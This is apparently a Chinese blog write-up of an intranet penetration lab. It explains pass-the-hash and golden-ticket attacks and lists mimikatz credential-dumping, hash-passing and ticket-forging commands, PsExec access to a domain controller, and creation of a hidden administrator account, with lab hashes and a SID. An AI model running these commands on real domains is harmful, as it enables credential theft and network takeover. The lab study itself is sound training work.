内网渗透(二)

预备知识

什么是域?

域是若干台计算机组成的集合,一个电脑也是。域中的电脑是分等级的,分为域控和成员机。

如何安装域?

在服务器管理中添加服务器角色,添加域服务

如何加入域?

首先一定要修改DNS服务器 ip为域控的ip,再使用域控的账号密码登录就可以加入了,账号的形式 域名/域控账号

哈希传递

当我们使用猕猴桃进行碰撞密码时,我们发现会没有明文出现,是因为高版本的windows是不会将明文密码保存在本机的。所以我们可以使用哈希传递拿取管理员权限。

使用语句:
privilege::debug
log
sekurlsa::logonpasswords
sekurlsa::pth /user: 用户名 /domian “域名” /ntlm: ntlm值

提取成功就会跳出获取权限的cmd框

PsExec的作用

能够使用域控的cmd

黄金票据

因为krbtgt账户其实就是那个KDC秘钥分发中心用的超管密码,我们拿着那个的票据,去访问客户机,客户机会认为我们是KDC秘钥分发中心,所以直接给了最高的权限允许我们访问,一般管理员会修改域控机密码,但是很少有管理员会修改Krbtgt的密码

我们通过以下语句来制作黄金票据

lsdump::dcsync /user:krbtgt 获取krbtgt的密码

提取其中的sid(不需要后面的-的数据) 和 hashNTLM

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi (制作票据)

kerberos::ptt administrator.kiribi (加载票据)

然后打开cmd 再利用 PsExec 获取域控cmd

靶场实战

一、远程连接
根据提示:

图片


连接:

图片

二、查看目标主机是否在域内
输入:systeminfo
结果:不在域内

图片

三、远程连接10.0.1.8查看是否在域内
输入:systeminfo
结果:在 zkaq.cn的域中

图片

四、查看域控的ip
输入:ipconfig -all(观察dns服务器)
结果:ip为 10.0.1.6

图片

五、使用猕猴桃碰撞10.0.1.8管理员密码
输入:
privilege::debug
log
sekurlsa::logonpasswords
结果:没有明文密码

图片

六、尝试是否能连接10.0.1.6的cmd
通过cmd使用桌面的PxExec
输入:PsExec.exe \10.0.1.6 cmd
结果:登录失败,我们并没有权限

图片

七、使用哈希传递获取权限
输入:sekurlsa::pth/user:administrator /domain:”zkaq.cn” /ntlm:61465a991b168727b65b3644aab823cd
结果:自动弹出cmd框

图片

八、使用弹出的cmd使用PxEsec
先调节路径
输入:PsExec.exe \10.0.1.6 cmd
结果:成功连接上10.0.1.6的cmd

图片

图片

九、创建新管理员
输入:
net user yy yy1233321! /add
net localgroup administrators yy /add
结果:创建成功(忘记截图了)

十、连接10.0.1.6
在\C\Users\Administrators.DC\桌面中有flag

结果:

图片

(黄金票据一直尝试错误了,就放弃了)

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/603279.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

解密某游戏的数据加密

前言 最近有个兄弟通过我的视频号加我,咨询能否将这个dubo游戏游戏开始前就将数据拿到从而进行押注,于是通过抓包工具测试了下,发现数据有时候是明文,有时候确实密文,大致看了下有这几种加密:Md5aes、Md5&a…

squeeze的用法

squeeze是压缩张量的命令 import torch a torch.randn(1,3) print(a) print(a.shape) 比如说squeeze(?)括号里是啥 就是在哪个维度上删除维度为1 之后的结果 比如上上面那个里子 a是([[]]) 但是在下面那个例子中d…

软胶囊弹性检测:确保药品质量与患者安全的关键步骤

软胶囊弹性检测:确保药品质量与患者安全的关键步骤 在医药领域,软胶囊作为一种常见的药物载体,其质量的优劣直接关系到药物的有效性和患者的安全。软胶囊的弹性作为其质量评估的重要指标之一,不仅影响其储存和运输的稳定性&#x…

社交客户关系管理(SCRM),和传统CRM的区分

一、SCRM是什么 SCRM是社交客户关系管理(Social Customer Relationship Management)的缩写,是指通过利用社交媒体和社交网络来管理和建立与客户之间的关系。SCRM将传统的客户关系管理(CRM)与社交媒体的互动和数据整合…

vue+sortablejs来实现列表拖拽——sortablejs的使用

sortablejs官网:https://sortablejs.com/ 最近在看form-builder组件,发现里面有用到sortablejs插件,用于实现拖拽效果。 但是这个官网中的配置,实在是看不懂,太简单又太复杂,不实用。 下面记录一下我的使用&#xff…

光伏设计的核心要素有哪些?

光伏设计是可再生能源领域中的一个重要分支,它涉及到将太阳能转换为电能的整个过程。在光伏系统的设计和构建过程中,有几个核心要素需要被充分考虑和精确计算,以确保系统的性能、可靠性和经济效益。 一、光照条件分析 光照条件是光伏系统设计…

Qwen大模型实践之初体验

Qwen大模型实践之初体验 测试机器, 使用InternStudio提供的开发机,配置如下: 部分资源详细信息: # CPUIntel(R) Xeon(R) Platinum 8369B CPU 2.90GHz# GPU(base) rootintern-studio-50014188:~# studio-smi Running studio-smi by vgpu-smiW…

测评方式揭秘:自养号测评与真人测评的利与弊

在当今电商行业飞速发展的背景下,不少卖家为了提升产品销量和积累良好评价,采取了真人测评和自养号测评两种策略。然而,这两种测评方式的具体运作机制和效果差异,许多卖家可能并未深入了解。接下来,我们将深入挖掘真人…

等保测评二级有哪些标准

等级保护测评(等保测评)是中国的一项网络安全标准,旨在评估和确保关键信息基础设施的安全。二级等保测评是适用于一般级别的信息系统,这些系统一旦受损,可能会对社会秩序、公共利益和公民权利造成一定程度的影响。 二级…

快速输出标准化3D课件,打造沉浸式培训体验

随着技术的日新月异和市场的迅猛扩张,企业对员工专业技能培训的需求日益凸显。传统的培训方式往往依赖于实地操作、现场指导,这不仅需要大量的人力、物力和时间成本,而且存在安全风险。特别是化工、机械制造等行业,实操培训的成本…

浅析扩散模型与图像生成【应用篇】(二十二)——DreamBooth

21. DreamBooth: Fine Tuning Text-to-Image Diffusion Models for Subject-Driven Generation 本文提出一种根据少量样例图片来对文生图模型进行微调的方法,从而可以生成包含样例物体,但风格、姿态、背景都可以任意修改的图片。现有的文生图模型都是需要…

智能可编程脉冲电源:为电源行业带来前所未有的创新

智能可编程脉冲电源是一种具有高精度、高可靠性、节能降耗和可编程性强等特点的电源设备。它主要由脉冲发生器、功率调节电路和控制电路等组成。脉冲发生器产生的脉冲信号可以驱动功率调节电路,实现对电源输出的电压和电流的精确控制。通过控制电路对脉冲信号进行调…

关闭vscode保存自动格式化的功能

1 首先打开设置 搜索:editor.formatOnSave 取消勾选框 2 再打开 settings.json 搜索 editor 找到 settings.json 设置: "editor.formatOnSave": false

速卖通商品评论API(aliexpress.item_review)返回值全解析

在电商领域,用户评论对于产品的推广和销售具有极其重要的影响。速卖通(AliExpress)作为全球知名的跨境电商平台,提供了丰富的API接口供开发者使用,其中aliexpress.item_review API允许开发者获取商品的评论信息。本文将…

基于SpringBoot的高校推荐系统

项目介绍 当前,随着高等教育的不断普及,越来越多的学生选择考研究生来提高自身的学术水平和竞争力。然而,考研生在选择报考院校和专业时面临着众多的选择和信息不对称的问题。为了解决这些问题,一些网站和APP已经推出了相关的院校…

LearnOpenGL(九)之材质

一、材质 在现实世界里,每个物体会对光产生不同的反应。比如,钢制物体看起来通常会比陶土花瓶更闪闪发光,一个木头箱子也不会与一个钢制箱子反射同样程度的光。在opengl中,我们可以针对每种表面定义不同的材质(Material)属性来模…

YzmCMS 7.0任意函数调用RCE 漏洞研究分析

YzmCMS是一款基于YZMPHP开发的一套轻量级开源内容管理系统,YzmCMS简洁、安全、开源、免费,可运行在Linux、Windows、MacOSX、Solaris等各种平台上,专注为公司企业、个人站长快速建站提供解决方案。 YzmCMS 某些接口调用了 db_pdo类的where方法 导致了远程命令执行漏洞&#xf…

分享6个免费下载电子书的网站

着急看书的宝子们看这里! 收藏了一堆电子书网站终于能派上用场了~ 01/Z-Library https://zh.zlibrary-be.se/ 世界上最大的电子图书馆,拥有超千万的书籍和文章资源,99%的书籍资料都能在这里找到。 我给的这个网址现在还能正常打开使用&…

台湾精锐APEX行星减速机噪音产生及优化策略

台湾精锐APEX行星减速机在各种机械装置中的应用逐渐广泛。然而,其噪音问题也日益凸显。噪音不仅影响工作环境,还可能对设备的正常运行和使用寿命产生负面影响。因此,了解APEX行星减速机噪音的产生以及优化噪音问题变得至关重要。 APEX行星减…

【2024最新华为OD-C卷试题汇总】游戏表演赛分队(100分) - 三语言AC题解(Python/Java/Cpp)

🍭 大家好这里是清隆学长 ,一枚热爱算法的程序员 ✨ 本系列打算持续跟新华为OD-C卷的三语言AC题解 💻 ACM银牌🥈| 多次AK大厂笔试 | 编程一对一辅导 👏 感谢大家的订阅➕ 和 喜欢💗 文章目录 前…